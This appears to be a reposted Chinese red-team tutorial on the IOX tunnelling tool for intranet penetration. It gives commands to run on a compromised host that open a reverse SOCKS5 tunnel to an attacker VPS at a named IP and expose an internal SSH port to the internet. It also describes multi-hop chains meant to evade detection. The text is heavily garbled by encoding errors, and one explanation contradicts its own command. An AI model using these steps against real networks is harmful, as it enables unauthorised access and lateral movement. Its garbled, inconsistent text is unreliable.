在內(nèi)網(wǎng)滲透中�����,如何穩(wěn)定地從外網(wǎng)訪問到內(nèi)網(wǎng)資源是貫穿信息收集����、漏洞利用��、橫向移動(dòng)�、數(shù)據(jù)回傳等各階段的核心問題。今天介紹的 IOX 工具�,體積小、功能強(qiáng)�����,支持多種端口轉(zhuǎn)發(fā)和 SOCKS5 代理��,是攻防對(duì)抗中極具實(shí)用性的“網(wǎng)絡(luò)隧道搭建利器”。
IOX 是一款基于 Go 開發(fā)的輕量代理和轉(zhuǎn)發(fā)工具�,具備以下特點(diǎn):
- 跨平臺(tái)(支持 Linux / Windows / Mac)
- 支持 SOCKS5、TCP 端口轉(zhuǎn)發(fā)
- 在紅隊(duì)實(shí)戰(zhàn)��、內(nèi)網(wǎng)維權(quán)��、內(nèi)網(wǎng)穿透中都極具價(jià)值��。
假設(shè)目標(biāo)內(nèi)網(wǎng)中存在一臺(tái)被控主機(jī)����,我們希望利用它來訪問更多內(nèi)網(wǎng)資產(chǎn),同時(shí)把流量轉(zhuǎn)發(fā)到自己的 VPS 做出站代理����。第一步:在被控 Linux 主機(jī)上運(yùn)行./iox proxy -r 49.232.134.151:9999-r 表示遠(yuǎn)程連接到 VPS 的 9999 端口被控主機(jī)會(huì)向 VPS 建立一個(gè)持久連接,充當(dāng)流量通道./iox proxy -l 9999 -l 1080-l 表示監(jiān)聽本地 9999 端口接收來自被控主機(jī)的連接同時(shí)將流量映射到本地 1080 端口��,提供 SOCKS5 服務(wù)此時(shí)��,只需要把你的瀏覽器或者 proxychains 配置成走 VPS 的 1080 SOCKS5���,就可以透明訪問被控主機(jī)所在內(nèi)網(wǎng)的任何目標(biāo)���。把內(nèi)網(wǎng) 22 端口暴露到公網(wǎng)./iox fwd -r 192.168.78.134:22 -r 49.232.134.151:9999此命令會(huì)把本地的 9999 端口轉(zhuǎn)發(fā)到 4444 端口��,常用于本地調(diào)試、多級(jí)代理或者對(duì)鏈?zhǔn)剿淼雷鲋欣^����。多層級(jí)端口轉(zhuǎn)發(fā)的思路
在更復(fù)雜的環(huán)境里,可能會(huì)存在多跳代理����,IOX 的 fwd 也可多次疊加使用。例如先把 3389 轉(zhuǎn)發(fā)到內(nèi)網(wǎng)的一臺(tái)跳板機(jī)�����,再由跳板機(jī)轉(zhuǎn)發(fā)到外部 VPS���,從而形成完整的多級(jí)鏈路�����,降低被檢測(cè)的風(fēng)險(xiǎn)���。IOX 不僅支持基礎(chǔ)的端口映射操作�,還提供了對(duì) SOCKS5 協(xié)議的強(qiáng)大支持��,可與 proxychains�����、rdesktop�、VNC 等工具無縫聯(lián)動(dòng),適用于多種內(nèi)網(wǎng)滲透場(chǎng)景��。無論是從外網(wǎng)打入內(nèi)網(wǎng)進(jìn)行橫向移動(dòng)����,還是通過代理鏈進(jìn)行遠(yuǎn)程控制訪問,IOX 都能穩(wěn)定�����、高效地完成任務(wù)��。在攻防演練��、紅隊(duì)行動(dòng)中����,IOX 就像一把萬能鑰匙����,輕松打通內(nèi)網(wǎng)通路����,為后續(xù)控制與數(shù)據(jù)流轉(zhuǎn)提供了堅(jiān)實(shí)的通信基礎(chǔ),真正做到了“隱蔽�、可靠�����、靈活”�。
?
閱讀原文:原文鏈接
該文章在 2025/10/9 13:20:48 編輯過
400 186 1886
